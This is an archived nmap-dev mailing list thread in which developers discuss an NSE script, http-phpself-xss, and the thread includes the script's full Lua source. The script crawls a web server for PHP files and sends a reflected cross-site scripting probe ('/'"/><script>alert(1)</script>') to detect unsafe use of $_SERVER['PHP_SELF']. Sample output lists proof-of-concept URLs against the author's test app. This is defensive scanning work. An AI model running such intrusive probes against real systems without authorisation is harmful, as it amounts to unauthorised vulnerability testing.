Nmap Development mailing list archives
Re: http-phpself-xss
From: stripes <stripes () tigerlair com>
Date: Thu, 5 Jul 2012 01:55:06 -0400
If you have a system I can test it against, I'll be more than happy to test it with the latest build. -Anne On Thu, Jul 05, 2012 at 12:45:53AM -0500, Paulino Calderon wrote:
Hi list, I've updated the script http-phpself-xss. Has anyone had a chance to test it? What do you think about the name? Is it implicit enough? Maybe http-phpself-xss-scan would be better. Anyway, I think this script is ready to be commited but I'd love to hear your thoughts before doing that. Cheers. On 30/05/2011 02:20 p.m., Paulino Calderon wrote:Correct. Lots of developers use $_SERVER["PHP_SELF"] to retrieve the script's name without escaping it first not knowing that attackers can tamper this variable. Other examples are: *http://www.mc2design.com/blog/php_self-safe-alternatives *http://www.securityfocus.com/bid/37351 *http://software-security.sans.org/blog/2011/05/02/spot-vuln-percentage I'll submit a new script to scan for more generic cross site scripting vulnerabilities after I make sure the crawling / parsing of all the malformed documents out there works correctly ;) Cheers. On 05/30/2011 07:54 AM, Abuse007 wrote:If I'm not mistaken the script is not trying to exploit the php parameters, such as data in your second example, but rather the PHP_SELF variable which is set the the relative URL of the currently executing script - including what comes after the php file. From the doco: - The filename of the currently executing script,relative to the document root. For instance,$_SERVER['PHP_SELF'] in a script at the addresshttp://example.com/test.php/foo.bar would be /test.php/foo.bar. See: - http://spotthevuln.com/2009/10/privilege-escalation-one-damn-thing/ Cheers On 30/05/2011, at 11:07 PM, "Hans Nilsson"<hasse_gg () ftml net> wrote:What about when only certain variables are vulnerable? For example example.com/test.php?<script>alert(1)</script> may not work when example.com/test.php?data=<script>alert(1)</script> works. Or what about if only POST-data is vulnerable? /Hans On Sun, 29 May 2011 03:04 -0700, "Paulino Calderon" <paulino () calderonpale com> wrote:Hi everyone, I'm attaching my script 'http-phpself-xss', this script detects php files vulnerable to Phpself Cross Site Scripting(*) in a web server. First, the script crawls the webserver to list all php files and then it sends an attack probe to identify all vulnerable scripts. Feel free to test this script against my dummy app -> http://calder0n.com/sillyapp/ (*) Phpself Cross Site Scripting vulnerabilities refers to cross site scripting vulnerabilities caused by the lack of sanitation of the variable $_SERVER["PHP_SELF"] in PHP scripts/web applications. Cheers. -- Paulino Calderón Pale Web: http://calderonpale.com Twitter: @paulinocaIderon _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/ Email had 1 attachment: + http-phpself-xss.nse 12k (text/plain)-- Hans Nilsson hasse_gg () ftml net -- http://www.fastmail.fm - A no graphics, no pop-ups email service _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/-- Paulino Calderón Pale Website: http://calderonpale.com Twitter: http://twitter.com/calderpwn
description=[[ Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER["PHP_SELF"]. This script crawls the webserver to create a list of PHP files and then sends an attack vector/probe to identify PHP_SELF cross site scripting vulnerabilities. PHP_SELF XSS refers to reflected cross site scripting vulnerabilities caused by the lack of sanitation of the variable <code>$_SERVER["PHP_SELF"]</code> in PHP scripts. This variable is commonly used in php scripts that display forms and when the script file name is needed. Examples of Cross Site Scripting vulnerabilities in the variable $_SERVER[PHP_SELF]: *http://www.securityfocus.com/bid/37351 *http://software-security.sans.org/blog/2011/05/02/spot-vuln-percentage *http://websec.ca/advisories/view/xss-vulnerabilities-mantisbt-1.2.x The attack vector/probe used is: <code>/'"/><script>alert(1)</script></code> ]] --- -- @usage -- nmap --script=http-phpself-xss -p80 <target> -- nmap -sV --script http-self-xss <target> -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-phpself-xss: -- | VULNERABLE: -- | Unsafe use of $_SERVER["PHP_SELF"] in PHP files -- | State: VULNERABLE (Exploitable) -- | Description: -- | PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities. -- | -- | Extra information: -- | -- | Vulnerable files with proof of concept: -- | http://calder0n.com/sillyapp/three.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E -- | http://calder0n.com/sillyapp/secret/2.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E -- | http://calder0n.com/sillyapp/1.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E -- | http://calder0n.com/sillyapp/secret/1.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E -- | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=calder0n.com -- | References: -- | https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) -- |_ http://php.net/manual/en/reserved.variables.server.php -- @args http-phpself-xss.uri URI. Default: / -- @args http-phpself-xss.timeout Spidering timeout. Default:10000 author = "Paulino Calderon" license = "Same as Nmap--See http://nmap.org/book/man-legal.html"; categories = {"fuzzer", "intrusive", "vuln"} local http = require 'http' local httpspider = require 'httpspider' local shortport = require 'shortport' local url = require 'url' local stdnse = require 'stdnse' local vulns = require 'vulns' portrule = shortport.http -- PHP_SELF Attack vector local PHP_SELF_PROBE = '/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E' local probes = {} --Checks if attack vector is in the response's body --@param response Response table --@return True if attack vector is found in response's body local function check_probe_response(response) stdnse.print_debug(3, "Probe response:\n%s", response.body) if string.find(response.body, "'\"/><script>alert(1)</script>", 1, true) ~= nil then return true end return false end --Launches probe request --@param host Hostname --@param port Port number --@param uri URL String --@return True if page is vulnerable/attack vector was found in body local function launch_probe(host, port, uri) local probe_response --We avoid repeating probes. --This is a temp fix since httpspider do not keep track of previously parsed links at the moment. if probes[uri] then return false end stdnse.print_debug(1, "%s:HTTP GET %s%s", SCRIPT_NAME, uri, PHP_SELF_PROBE) probe_response = http.get(host, port, uri .. PHP_SELF_PROBE) --save probe in list to avoid repeating it probes[uri] = true if check_probe_response(probe_response) then return true end return false end --- --main --- action = function(host, port) local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" local timeout = stdnse.get_script_args(SCRIPT_NAME..'.timeout') or 10000 local crawler = httpspider.Crawler:new(host, port, uri, { scriptname = SCRIPT_NAME } ) crawler:set_timeout(timeout) local vuln = { title = 'Unsafe use of $_SERVER["PHP_SELF"] in PHP files', state = vulns.STATE.NOT_VULN, description = [[ PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities. ]], references = { 'http://php.net/manual/en/reserved.variables.server.php', 'https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)' } } local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local vulnpages = {} local probed_pages= {} while(true) do local status, r = crawler:crawl() if ( not(status) ) then if ( r.err ) then return stdnse.format_output(true, "ERROR: %s", r.reason) else break end end local parsed = url.parse(tostring(r.url)) --Only work with .php files if ( parsed.path and parsed.path:match(".*.php") ) then --The following port/scheme code was seen in http-backup-finder and its neat =) local host, port = parsed.host, parsed.port if ( not(port) ) then port = (parsed.scheme == 'https') and 443 port = port or ((parsed.scheme == 'http') and 80) end local escaped_link = parsed.path:gsub(" ", "%%20") if launch_probe(host,port,escaped_link) then table.insert(vulnpages, parsed.scheme..'://'..host..escaped_link..PHP_SELF_PROBE) end end end if ( #vulnpages > 0 ) then vuln.state = vulns.STATE.EXPLOIT vulnpages.name = "Vulnerable files with proof of concept:" vuln.extra_info = stdnse.format_output(true, vulnpages)..crawler:getLimitations() end return vuln_report:make_output(vuln) end
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
-- If you don't know there's a (\`--/') _ _______ .-r-. trampoline in the room, you're >.~.\ `` ` `,`,`. ,'_'~`. not going to dust the ceiling for (v_," ; `,-\ ; : ; \/,-~) \ fingerprints. -Law & Order:SVU `--'_..),-/ ' ' '_.>-' )`.`.__.') stripes at tigerlair dot com ((,((,__..'~~~~~~((,__..' `-..-'fL _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: http-phpself-xss Paulino Calderon (Jul 04)
- Re: http-phpself-xss stripes (Jul 04)
- Re: http-phpself-xss Paulino Calderon (Jul 05)
- Re: http-phpself-xss stripes (Jul 05)
- Re: http-phpself-xss Paulino Calderon (Jul 05)
- Re: http-phpself-xss stripes (Jul 04)